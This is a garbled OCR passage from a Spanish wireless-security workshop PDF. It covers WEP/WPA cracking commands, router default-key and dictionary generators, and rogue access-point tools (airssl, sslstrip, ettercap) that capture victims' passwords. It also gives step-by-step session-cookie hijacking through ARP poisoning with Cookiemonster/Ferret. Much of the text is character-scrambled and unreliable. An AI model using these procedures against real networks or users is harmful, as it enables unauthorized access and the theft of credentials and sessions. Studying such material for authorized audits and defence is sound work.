http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 56/260

no lan3a pa5uetes de respuesta. %ero cuando el % es vulnerable seconsigue obtener la clave wep de una manera relativamente rápida.%ongamos unos ejemplos de las cadenas de ata5ues.%or supuesto + además es recomendable se pueden combinar los ata5ues.A)Comandoairepla+-ng -0 A -a mac del % monKA,Comandoairepla+-ng -= 0 -e E''I! -a Gmac del %H -7 Gnuestra macH mon0AComandoairepla+-ng -D -b Gmac del %H -7 Gmac del cliente conectadoH monKA;

Comandoairepla+-ng -4 -7 Gmac de clienteH monK

AIRCRAC6NG'e utili3a para desencriptar los pa5uetes capturados + as2 obtener la clave dela red wii.%ara ello le indicaremos el arc7ivo) 5ue 7emos capturado previamente conairodump-ng + comen3ara el proceso de descirado) 7asta 5ue nos diga siencontró la clave o no) de ser negativo el resultado) nos indicara 5uesigamos capturando pa5uetes 7asta un numero KComandoaircrac/-ng Zb G(''I!H rc7ivo.cap%ara más inormación sobre esta suite visita su $II7ttp??www.aircrac/-ng.org?do/u.p7p

1erramienta! de .i$i!la'5

Ci$rado!E!paa

dec!agemerramienta para desencr+ptar las claves de los routers sagem&so decsagem _-i` ]numero''I!^ ]clave^ utor s/a=i# compilado por dudu#

www.seguridadwireless.net 

dlin7decrptererramienta para desencr+ptar las claves de los routers dlin/&so dlin/decr+pter.s7 ,CTR>&1ER N>,(RETICER>TEY'.t#t

Ejemplo dlin/decr+pter.s7 KKKKKKKKKKKK ?root?!es/top?/e+s.t#t

56

Page 57: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 57/260

Page 58: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 58/260

Page 59: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 59/260

  +ara t!d!s l!s canales /R

+ara v!lver al M/ -D mHnter=

a catura de dat!s durar>... 1 minut!s

e atacar>n ... !d!s l!s canales...

%niciand!...

.../: interumir la catura...

/!s abre !tra ventana c!n air!dum , emieAa a escanear las redes.na veA transcurrid! el tiem! ue indicam!s de catura n!s aarecera l!si#uiente*

istad! de +@ :betiv!

M / ; %;

24*;*6*85*K1*61 JJJJJ 0 JJJJJ00*0K*86*6*45*23 $+2$+ 0 (iusc00*0*6*&2*&;*11 $+2 0 edur!am24*;*6*80*;8*1 :+/ 0 (iusc-(eb24*;*6*80*;8*0 $+2$+ 0 edur!am24*;*6*80*;;*42 $+2$+ 0 (iusc24*;*6*80*;;*41 :+/ 54 (iusc-(eb

24*;*6*80*;;*40 $+2$+ 0 edur!am00*0*6*8*3K*53 $+2$+ 0 ula-Master00*0*6*;8*4* $+2$+ 0 ces#a00*0*6*&*1*;6 $+2$+ 0 invitad!00*0*6*K2*8*76 $+2$+ 0 mmedia;8*7*8*0K*39*0 $+2$+ 35 edur!am00*0K*86*6*45*90 $+2$+ 0 edur!am00*0K*86*6*45*93 $+2$+ 5 (iusc;8*7*8*34*77*01 :+/ 17 (iusc-(eb00*0K*86*6*5&*50 $+2$+ 10 edur!am;8*7*8*34*77*02 $+2$+ 0 (iusc

00*0K*86*6*45*91 :+/ 100 (iusc-(eb;8*7*8*0K*39*1 :+/ 23 (iusc-(eb;8*7*8*34*77*00 $+2$+ 0 edur!am00*0K*86*6*5&*51 :+/ 3 (iusc-(eb;8*7*8*0K*39*3 $+2$+ 0 (iusc00*0K*86*6*5&*53 $+2$+ 0 (iusc;8*7*8*0K*37*83 $+2$+ 206 (iusc;8*7*8*0K*37*81 :+/ 323 (iusc-(eb;8*7*8*0K*37*80 $+2$+ 2 edur!am24*;*6*80*;8*;2 $+2$+ 30 (iusc

24*;*6*80*;8*;0 $+2$+ 0 edur!am

59

Page 60: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 60/260

24*;*6*80*;8*;1 :+/ 217 (iusc-(eb

-- +r!cesand! ;at!s... sere...-- erminad!.

i al#una e las redes tiene atr!nes de clave c!n!cid!s n!s aarecera laclave.sin! n!s aarecera l! si#uiente*

M % + R + R : / : / : % ; :

L L L / % : / L L L

/! e han !btenid! resultad!s

+uede ser ue en la catura n! ha,an R; c!n atr!n c!n!cid!! ue n! habian su"cientes ;@s caturad!s

+ulsa %/R: ara v!lver al men

9no;''erramienta para atacar redes con Essid del tipo ono####

 l iniciar la 7erramienta podemos ver como se usa

ono4## v0.0.4a 80=?0;?<0==9 ,ambostar-Niro3,eon_www.seguridadwireless.net

uso ono4## ]E''I!^ ](''I!^ ]wpa?wep^_ic7ero`ejemplo ono4## ono=<D4 E0F=ADaabbcc wpa _ic7ero`ejemplo ono4## ono=<D4 000=D;aabbcc wep _ic7ero`

4ureNet#or7!erramienta para generar dicionarios para crac/ear wpa?wpa< de puntos deacceso !lin/ + "in/s+s

 l iniciar el programa nos indica como se usa

 TTTT T TT TT TT

? TT TT TTTTTTTTTT ? ? ?TT ? ?TT TTTTTT TTTTT? ?TTTTTTT? ?T? ? ? ? ? TTT? T ? ? ? T ? TT? ? ? ? TT ? TTT? ??T? TTT?? TTTT? ?T? ? ? ? TT? ? ? TT? ?T ? ? ? ?T? ? ? ? 8TT 9

?T? TT)T?T? TTT?T? T?TTT?TT? TT?TT?TTTT?T? ?T?T?TTTT?

!"IN W "IN'Y' diccionar+ generator or wpa?wpa<

&sagep+t7on .?%ure-*ene+sinal.p+ _options...`(+ ale#altea=<Dfgmail.com  unctionmi#er.blogspot.com 

60

Page 61: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 61/260

>ptions--continue !o not displa+ t7e @ContinueS@ message.--bssid KKKKKK &se t7e release date o t7e router as starting date >R--start !!?,,?YYYY use a custom starting date >R

let it blan/ to use t7e deault date 80=?0=?<0=09.--end !!?,,?YYYY &se a custom ending date >Rlet it blan/ to use t7e current date 80<d?0<d?0<d9. 8time(.da+)time(.mont7)time(.+ear9

E#amplesp+t7on .?%ure-*ene+sinal.p+ --bssid 0004A --end =D?0<?<0=Dp+t7on .?%ure-*ene+sinal.p+ --start <4?==?<0== --end =D?0<?<0=DEl diccionario sera generado en ?opt?%ureNetwor/s?output.t#t

R.lan8Decrpter

erramienta para crear dicionarios para redes con nombre R-$lanK parausarlos para crac/ear las claves de dic7as redes. l iniciar el programa nos e#plican su uso + las distintas opciones 5ue tieneR-$lanK!ecr+pter 0.F - <0=0 n7aalcl/iemr&so R-$lanK!ecr+pter ]diccionarioTsalida^ _opciones`>pciones

-7 ]sep^ Crea un diccionario 7e#adecimal) el separador es ]sep^ 8sino se especiica VV por deecto9

-n ]nbits^ "ongitud de la clave $E% 4?=<;?=A<?<A?A=< 8=<; por deecto9>pciones avan3adas

-c ]nc7ar^ Numero de caracteres no ijos 8; por deecto9-cm ]decc7ar^ Caracter en decimal de los b+tes ijos 84; por deecto9-min ]num^ Numero inicial 8del numero no ijo9-ma# ]num^ Numero inal 8del numero no ijo9-r No escribir retorno de carro CR al inal de cada linea. " en lugar 

de CRh"-m ]nb+tes^ "ongitud de la clave en b+tes 8incompatible con V-nV9-5 ctivar 5uiet mode 8no muestra estado por pantalla9

!t7e!erramienta para obtener las claves por deecto de los routers 17omson

 l iniarlo aparecen como se usa + las opciones&so st/e+s _ -i ]ssid octets^ ` _ -o ]output ile^ `st/e+s compilado para seguridadwireless.net-i "os octetos 7e#adecimales del ''I! del router 17omson-o Especiicar el ic7ero de salida para las posibles claves-v Imprime en pantalla las posibles claves encontradas

61

Page 62: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 62/260

T4Lin7gen6e!erramienta para generar diccionarios con las claves por deecto de losrouters 1%-"in/1%-"in/ gen/e+s

&sage1%"in/-*ene+sinal.p+ _options...`(+ ale#altea=<Dfgmail.com  unctionmi#er.blogspot.com >ptions--continue !o not displa+ t7e @ContinueS@ message.--bssid KKKKKK &se t7e release date o t7e router as starting date >R--start !!?,,?YYYY use a custom starting date >R

let it blan/ to use t7e deault date 80=?0=?<0=09.--end !!?,,?YYYY &se a custom ending date >R

let it blan/ to use t7e currentdate 80<d?0<d?0<d9.

8time(.da+)time(.mont7)time(.+ear9E#amplesp+t7on .?1%"in/-*ene+sinal.p+ --bssid 4M00< --end =D?0<?<0=Dp+t7on .?1%"in/-*ene+sinal.p+ --start <4?==?<0== --end =D?0<?<0=DEl diccionario sera generado en ?opt?1%"in/-ttac/!ictionar+?output.t#t

tele*dicerramienta para generar dicionario con las claves por deecto para routersde 1ele<.

 l iniciar nos indican el uso + opciones

tele<dic v0.< -<00F Niro3W,el>n. Este 'otware es libre + gratuito.*N&8*%"vD.09

&so tele<dic ao ic7ero _-t< -a<`

ao < &ltimos dIgitos del ao en 5ue se ad5uirbio el router.

ic7ero nombre de ic7ero donde guardar las claves.

stdout para salida por pantalla.

opciones-t<) genera claves tipo IK=B%B#######. %or deecto son IK=B#######.-a<) genera claves con los < dIgitos del ao indicado.

Ejemplo tele<dic claves 0; -^ IK=B;######

Ejemplo tele<dic claves =< -a< -^ IK=B=<######

62

Page 63: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 63/260

&oda$oneerramienta para generar claves $% + pin $%' de routers de vodaone dletipo BodaoneKKKK

 l iniciar nos indican el uso + opciones

*enerador de clave $% + %IN $%' de BodaoneKKKK Escrito en bas7 por geminisTdemon - www.seguridadwireless.net  lgoritmo descubierto por 'tean Bie7bc/ *racias a CoemanM por e#plicar el uncionamiento del algoritmo

,Cs B&"NER("E' %R&E( REC>,EN!!

;4FCKKKKKK C"BE $%M4D=M0KKKKKK C"BE $%;;0DAAKKKKKK C"BE $%=CCDCKKKKKK C"BE $%A0MEA!KKKKKK C"BE $%00=<(KKKKKK C"BE $%

EOE,%"> ?usr?bin?Bodaone.s7 00==<<DD44AA

$epattac/erramienta para 7acer ata5ues de dicionario contra redes con encriptaciónwep.

 l iniciar nos indican el uso + opciones

$E%11C b+ !omini/ (lun/ and lain *irardet - Bersion 0.=.D

usage wepattac/ - dumpile _-w wordile` _-m mode` _-n networ/`- dumpile networ/ dumpile to read

8in %C% ormat as 1C%!&,% or E1ERE" uses9-w wordlist wordlist to use 8deault stdin9-m mode run wepattac/ in diente modes 8deault all9

values 4) =<;) n4) n=<;-n networ/ networ/ number to attac/-S '7ows t7is 7elp

#landecrptererramienta para generar dicionarios para redes del tipo $"NTKK

 l iniciar nos indican el uso + opciones

63

Page 64: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 64/260

wlandecr+pter v=.D.4 8<0=<?=0?<9 _7ttp??www.seguridadwireless.net<00 Nilp0inteR <00M-0F dudu#<0=0 (lac/ole<00F-== Niro3,eon

<0=< !esarrollo liveuso wlandecr+pter _-e` ](''I!^ ]E''I!^ _ic7ero`wlandecr+pter -a ]E''I!^ _ic7ero`wlandecr+pter -l-l lista en pantalla todos los routers conocidos-a genera diccionario para todos los routers + una $"NTKK-e genera diccionario e#perimental para routers desconocidos

'i ]E''I!^ [ $"NTSS genera todas las redes desde $"NT00 a$"NT

.lanRea@ererramienta para generar reali3ar in+ección arp) ata5ues de diccionario +generar distintos dicionario.

 l iniciar podemos ver las distintas opciones de la 7erramienta[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[

$lanReaver v0.A b+ lui! ? Oose C'' 8eb. <0==9_7ttp??www.seguridadwireless.net

[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[09 +uda.=9 In+eccion R%.<9 ta5ue de diccionario.[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[*ENER!>RE' !E !ICCI>NRI>'----------------------------D9 'trin*enerator v=.D49 $lan!ecr+pter v=.D.<A9 Oa33tel!ecr+pter v0.<.=9 $lan4## v0.=.<

M9 >no4## v0.0.<a----------------------------;9 (orrar diccionarios [^ 809.[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[F9 $avemon[8on9 =09 Rate[8N9==9 Qualit+[8N9 =<9 "ogs[8o9=D9 (orrar temporales + logs [^ 809.=49 ta5ue de diccionario ,odo turbo.[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[Elige una opcion

64

Page 65: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 65/260

 l darle a los distintos generadores de diccionarios nos aparecen lasopciones de cada uno de ellos

StrinGenerator 

*enerador de diccionarios) para atacar 7ands7a/e de redes $%.erramienta mu+ completa con la 5ue podremos crear nuestros diccionarioscon las variables 5ue consideremos oportunas) para cada caso.

 l iniciarlo podemos ver sus opciones [[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[

'trin*enerator v=.D b+ lui![[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[=.- !ic. letras minusculas.<.- !ic. letras ,Y&'C&"'.D.- !ic. letras minusculas + numeros.

4.- !ic. letras ,Y&'C&"' + numeros.A.- !ic. numeros..- !ic. numeros desde... 7asta...M.- !ic. EK.;.- !ic. EK aleatorios.F.- !ic. con string + letras minusculas.=0.- !ic. con string + letras ,Y&'C&"'.==.- !ic. con string + numeros.=<.- !ic. con string) letras minusculas + numeros.=D.- !ic. con string) letras ,Y&'C&"' + numeros.=4.- !ic. a medida.=A.- !ic. a medida por volumenes.=.- iltrar palabras en arc7ivo de te#to.=M.- Conversor arc7ivos ,a+usculas?,inusculas.---------------------------------------------------p.-%reijo N?.s.-'uijo N?.[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[>pcion

Como veis nos orece m:ltiples posibilidades) para nuestro diccionario)desde crear un diccionario solo num6rico o solo alab6tico) 7asta crear unopersonali3ado en el 5ue nosotros decidiremos 5ue caracteres 8letras)n:meros) s2mbolos etc.9'i elegimos=.- !ic. letras minusculas.Nos pedirá el nombre 5ue le 5ueremos dar al diccionario.

65

Page 66: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 66/260

"a longitud de la cadena 5ue estará entre * , 8nosotros vamos a elegir Dpara 5ue sea rápido9. Esto es la longitud de la posible contrasea 5ue vamosa pasar posterior mente con alg:n so) como aircrac/-ng o %+rit.

 lgunos ejemplos de peso + tiempo 5ue se tardan en crear los diccionarios)e#tra2do del "EE,E de la aplicaciónLetra! min!cula!5 @aria3le! OP M3Q &aria3le! *) G3 uno! ) min+O @aria3le! QO G3 una! hora!+Nmero!5O @aria3le! (( M3( @aria3le! P M3 poco m%! de * min+P @aria3le! ,) G3

el diccionario generado será guardado en la carpeta root+Con esta 7erramienta podr6is generar cual5uier diccionario) para 7acer vuestras pruebas + vuestras auditorias) solo necesitáis decirle 5ue es lo 5ue5uer6is 5ue contenga el diccionario. Y por avor no perdáis el tiempo creandodiccionarios de *b + *b con todo lo 5ue se os ocurra) por5ue no tendr6istiempo en vuestra vida para pasarlo + además es posible 5ue 5uem6is elmicro de vuestra má5uina.

 5u2 ten6is un site en el 5ue podr6is comprobar cuanto se tarda en pasar undiccionario) seg:n lo 5ue contenga7ttp??www.bitsdelocos.es?computo.p7p

#lan;''erramienta para pasar diccionarios a redes del tipo wlan######

 l iniciarlo nos aparece como se usa

wlan4## v0.<.0 8<0=0?==?=49 _7ttp??www.seguridadwireless.net lgoritmo por ,ambostar 8gosto <0=09. Coder Niro3,eon

uso wlan4## ]E''I!^ ](''I!^ _ic7ero`ejemplo wlan4## wlan=<D4A 00==<<DD44AAejemplo wlan4## +acom=<D4A 00==<<DD44AAejemplo wlan4## wii=<D4A 00==<<DD44AA dicci.t#t

.4Amagic7eerramienta para crear dicionarios para routers Comtrend?1ecom

$%magic/e+ v0.D.0 8<0=<?==?<<9 _7ttp??www.seguridadwireless.net

 lgoritmo !udufseguridadwireless.net WW ,ambostar - Coder Niro3

66

Page 67: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 67/260

 &so wpamagic/e+ ]E''I!^ ](''I!^ _ic7ero`wpamagic/e+ -t _ic7ero`wpamagic/e+ -l

>pciones

-l "istado de Routers conocidos-t Crea diccionario Routers Comtrend?1ecom 800=F=A9-7) --7elp ,uestra a+uda]E''I!^ [ N>E''I! para Essid cambiado

Ejemploswpamagic/e+ -t dicci.t#twpamagic/e+ noessid ==<<DDaabbccwpamagic/e+ ja33telT=<D4 aabbccddee dicci

%ara ver el listado de routers compatibles con la 7erramienta ponemoswiisla# k wpamagic/e+ -l

$%magic/e+ v0.D.0 8<0=<?==?<<9 _7ttp??www.seguridadwireless.net"istado de routersC>,1REN! 00=<(KKKKKKC>,1REN! 00=!<0KKKKKKC>,1REN! D;M<C0KKKKKKC>,1REN! 4;0CKKKKKK1EC>, 00=F=AKKKKKKYKE" 00=4KKKKKKYKE" 4DE=KKKKKK

Nota ,C?s no incluidas en esta lista se trataran pordeecto igual 5ue si ueran de tipo 4;0C

4otenciaCrdaT'4o#erCon$igerramienta para modiicar la potencia de nuestra tarjeta wii

Credenciale!erramientas para capturar las credenciales o las coo/ies de inicio de sesióna sitios web de e5uipos de nuestra red.

Air!!l -MITM creando un ap $al!o0Con esta 7erramienta crearemos un ap also 5ue la victima se conecte anuestro ap + conseguir sus credenciales.%ara usar la 7erramienta necesitamos < interaces de red.&na de ellas debe estar conectada a internet) la otra debe ser inalambrica +estar libre para crear el % also si no nos dará un error.'i sólo tenemos una intera3 inalámbrica sólo tenemos < opciones=- Comprar un adaptador wii usb. &na interace la conectamos a internet +en la otra creamos el % also.

67

Page 68: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 68/260

<- Conectarnos a internet por cable de red o modem D* + usar la interaceinalámbrica para crear el % also.El uncionamiento es sencillo.

 l iniciar la aplicación vamos contestando a lo 5ue nos va preguntando

 IR''" D.0 - Credits /illadaninja W *0Oon W www.'eguridad$ireless.net *atewa+ lo Internet Interace lin/Enter t7e networ/s gatewa+ I% address or press enter to use lolo selected as deault.Enter +our interace t7at is connected to t7e internet or press enter to uselin/lin/ selected as deault.'elect +our interace to be used or t7e a/e %

=9 et70

<9 wlan0S <Enter t7e E''I! +ou would li/e +our rogue % to be called or press enter touse a/eT%

 ndroid%ound < processes t7at could cause trouble.I airodump-ng) airepla+-ng or airtun-ng stops wor/ing atera s7ort period o time) +ou ma+ want to /ill 8some o9 t7emP%I! Name=M<0 Networ/,anager=MD< wpaTsupplicantInterace C7ipset !riverwlan0t7eros RF<;0 at7F/ - _p7+=`

8monitor mode enabled on mon09Coniguring a/e%....

 irbase-ng will run in its most basic mode) would +ou li/e to run airbase-ng inrespond to all probes modeSIn t7is mode +our c7oosen E''I! is not used) but instead airbase-ngresponds to all incoming probes) providing victims 7ave auto connect eature

on in t7eir wireless settings 8,>'1 !>9) airbase-ng will imitate said savednetwor/s and victim will connect to us) li/el+ un/nowingl+.%"E'E &'E 1I' >%1I>N RE'%>N'I("Y.=9 Yes<9 NoS =

&na ve3 conigurado el ap also nos sale abre un mensaje en el 5ue nospregunta si 5ueremos 5ue airbase responda a todas las pruebas de cone#iónde los cliente.

68

Page 69: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 69/260

'i la victima usa $indows con la opción de autocone#ión 87abilitada por deecto9 + esta cerca de nuestro ap se conectara automaticamente a 6l.%ulsamos =9 Yes

 7ora en la ventana principal aparece lo siguiente

'tarting a/e%...Coniguring orwarding tables...iptables v=.4.<0 (ad I% address @lo@1r+ iptables -7V or Viptables --7elpV or more inormation.

'etting up !C%...'tarting sslstrip...

sslstrip 0.F b+ ,o#ie ,arlinspi/e running...'tarting ettercap...'tarting dritnet...

 ctivated...

 irssl is now running) ater victim connects and surs t7eir credentials will bedispla+ed in ettercap.You ma+ use rig7t?let mouse buttons to scroll up?down ettercaps #term s7ell)ettercap will also save its output to ?root?irssl?etter.cap.'slstrip captured passwords will be saved to ?root?irssl?passwords.t#t.!ritnet images will be saved to ?root?irssl?drittnetdata

I,%>R1N1... ter +ou 7ave inis7ed please close airssl and clean up properl+ b+ 7ittingan+ /e+)i airssl is not closed properl+ ERR>R' $I"" >CC&RNos inorma 5ue los ic7eros se guardaran en ?root?irssl pero es incorrecto."os ic7eros se guardan en ?tmp?irssl

Y nos abre otras 4 ventanas 5ue son las siguientesa/e% ,uestra los datos + la mac del % creado!C% ,uestra la inormación de nuestro servidor !C%ettercap ,uestra las capturas%assword ,uestra los passwords capturados'i se conecta alguna victia a nuestro % capturaremos los datos traseridos +

los passwords.

%odemos ver como se usa esta 7erramienta en este video7ttp??www.+outube.com?watc7Sv[#j(&sKO 

Coo7iemon!tererramienta para capturar coo/ies de sesión de e5uipos de nuestra red.%rimero debemos conectarnos al mismo punto de acceso donde esta ele5uipo al 5ue 5ueremos capturar las coo/ies."uego abrimos el terminal + ponemos

69

Page 70: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 70/260

wiisla# k ec7o = ^ ?proc?s+s?net?ipv4?ipTorwardpara poner nuestro e5uipo en modo enrutador.>tra opción es crear nuestro propio punto de acceso also.%ara ello necesitamos < interaces de red. &no conectado a internet + otro

para crear el % also. brimos la aplicaciónBamos a la pestaa settings%onemos enireo# bin ?usr?bin?ireo#ireo# coo/ie ?root?.mo3illa?ireo#?wwlM//oF.deault?coo/ies.s5lite+ le damos a appl+Bamos a la pestaa R%) elegimos la interace 8wlan0 en nuestro caso9 + ledamos a 'canEn la pantalla nos apareceran los e5uipos de la red.

En nuestro caso aparece el punto de acceso 8=F<.=;.=.=9 + un cliente8=F<.=;.=.D49

"os arrastramos a target + target < respectivamente.

70

Page 71: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 71/260

 brimos la pestaa 'ni) selecionamos la interace con la 5ue estamosconectados al ap 8wlan0 en nuestro caso9marcamos e#clude m+ ip + pulsamos sni

Bamos a la pestaa R% + pulsamos 'tart R% para iniciar elenvenenamiento R% brimos la pestaa Coo/ie'i los clientes abren webs con coo/ies las veremos en esta pestaa

71

Page 72: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 72/260

'i alguna de las coo/ies es de una sesion abierta en alguna web 5uenecesita login.%ulsamos sobre ella + le damos al botón de abajo 'et coo/ie in ireo#

Nos abrira ireo# con la coo/ie capturada + la sesión iniciada 8sin necesidadde login9%odremos navegar en la web 5ue se logeo el cliente al 5ue capturamos lacoo/ie'i 5ueremos usar la coo/ie otras veces vamos a 'ettings (rowse + vemosdonde esta almacenada la coo/ie'i usamos $iisla# en modo live 8no persistente9 es necesario copiarla aldisco duro o una memoria usb para no perderla + poder usarla mas adelante.1ambien podremo guardarla desde ireo# pinc7ando en Coo/ie ,anager.En este video podemos ver como se usa la aplicación7ttp??www.+outube.com?watc7Sv[luij+M-/bs 

G9!criptSSLEste script nos servira para crear un ap also + capturar los logins ssl

&so de la 7erramienta"o iniciamos + nos aparece lo siguiente *>Yscript''" D.4-betaA b+ *>Yilms

q

72

Page 73: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 73/260

  (asado en airssl.s7creado por /illadaninja

Comprobando la disponibilidad de los comandos

Comprobando iwconig... >Comprobando ip... >Comprobando egrep... >Comprobando grep... >Comprobando ping... >Comprobando sslstrip... >Comprobando dritnet... >Comprobando ettercap... >Comprobando iconig... >Comprobando route... >

Comprobando uni5... >Comprobando iptables... >Comprobando d7cpcd... >Comprobando #term... >

'e 7an detectado < interaces de red

Comprobando cone#ión a Internet en et70... N> C>NEC1!>Comprobando cone#ión a Internet en wlan0... N> C>NEC1!>

ERR>R Ninguna de las < tarjetas de redestá conectada a Internet.Necesitas conectar a Internet una deellas para 5ue el script uncione.

%ulsa una tecla para salir...

%ara usar la 7erramienta necesitamos < interaces de red.&na de ellas debe estar conectada a internet) la otra debe ser inalambrica +

estar libre para crear el % also si no nos dará un error.'i sólo tenemos una intera3 inalámbrica sólo tenemos < opciones=- Comprar un adaptador wii usb. &na interace la conectamos a internet +en la otra creamos el % also.<- Conectarnos a internet por cable de red o modem D* + usar la interaceinalámbrica para crear el % also.

73

Page 74: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 74/260

#EA4e .irele!! EA4 E'tractor"o 5ue 7ace este script es e#traer los pa5uetes E% asociandonos al puntode acceso.

 l inicar nos aparece esto

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< <<<<<< (+e $ireless + tract!r 0.2 <<<<<< <<<<<< + ;!main sername tract!r <<<<<< <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

F-N %n !rder t! etract + ackets ,!u (ill need t! ass!ciateHn!t authenticate= (ith the access !int !" interest

F-N ?!ur (ireless net(!rk card must su!rt acket inecti!n.

F-N /!( checkin# ,!ur (ireless card...

FON nable t! nd an, (ireless inter"aces in m!nit!r m!de.

F-N he "!ll!(in# inter"aces eist*--------------------------------------------------------%nter"ace hiset ;river(lan0 ther!s R9280 ath9k - Fh,1N------------------------------------------------------------------------------FJN nter the inter"ace t! ut int! m!nit!r m!de and ress /R. i.e (lan0------------------------------------------------------------------------------/!s re#unta ue inter"ace uerem!s usar , ulsam!s enter(lan0

F-N /!( attemtin# t! ut ,!ur adat!r (lan0 int! m!nit!r m!de...lease(ait

F-N %" an %:%&&P* err!r (as disla,ed a#ainst (lan0Cthen ,!u card'driver is n!t c!matable

F-N +ress nter t! c!ntinue i" ,!u did n!t see the %:%&&P err!r.

FQN uccessC created m!n0 inter"ace in m!nit!r m!de.

F-N ?!u need t! ass!ciate (ith the access !int in uesti!n be"!re an,

in"!rmati!n can be etracted

74

Page 75: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 75/260

F-N /!te* it sh!uld be access !ints that !nl, have MP (ithin the c!lumnC

(hich means it is usin# 802.1

F-N ls! it sh!uld be an access !int (ith traSc !r is likel, t! have traSc.check under ;ata c!lumn

F-N ?!u (ill be resented a list all (ireless net(!rks. $hen ,!u haveidentied

the %; !" interest ress R

F-N +ress /R t! c!ntinue

a herramienta !ndra nuestra inter"ace en m!d! m!nit!r.+ulsam!s enter , emieAa a escanear las redes cercanas.+ulsam!s trlQ ara arar el escane! , n!s aarece l! si#uiente* 4 NF lased* 0 s NF 2014-06-12 18*52 10 NF lased* 0 s NF 2014-06-12 18*52 10 NF lased* 0 s NF 2014-06-12 18*52 10 NF lased* 0 s NF 2014-06-12 18*52 5 NF lased* 0 s NF 2014-06-12 18*52 11 NF lased* 0 s NF 2014-06-12 18*52 11 NF lased* 0 s NF 2014-06-12 18*52

  11 NF lased* 0 s NF 2014-06-12 18*52  6 NF lased* 0 s NF 2014-06-12 18*52

6 NF lased* 0 s NF 2014-06-12 18*52 12 NF lased* 4 s NF 2014-06-12 18*52 12 NF lased* 4 s NF 2014-06-12 18*52 12 NF lased* 4 s NF 2014-06-12 18*52 1 NF lased* 4 s NF 2014-06-12 18*52 1 NF lased* 4 s NF 2014-06-12 18*52 c 7 NF lased* 4 s NF 2014-06-12 18*52 7 NF lased* 4 s NF 2014-06-12 18*52 c 13 NF lased* 4 s NF 2014-06-12 18*52 13 NF lased* 4 s NF 2014-06-12 18*52 13 NF lased* 40 s NF 2014-06-12 18*52 c

K%; +$R Keac!ns <;ataC <'s MK / %+R %; c00*0K*86*5*&8*31 -1 0 0 0 133 -1 Tlen#th00*25*00*&&*94*73 -1 0 0 0 -1 -1 Tlen#thc24*;*6*85*K1*60 -1 0 39 0 133 -1 $+ Tlen#thc24*;*6*80*;8*;2 -64 90 112 0 11 54e. $+2 M+ MP

(iuscc24*;*6*80*;8*;0 -64 83 0 0 11 54e. $+2 M+ MP

edur!amc;8*7*8*0K*37*81 -79 94 80 6 6 54e. :+/ (iusc

75

Page 76: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 76/260

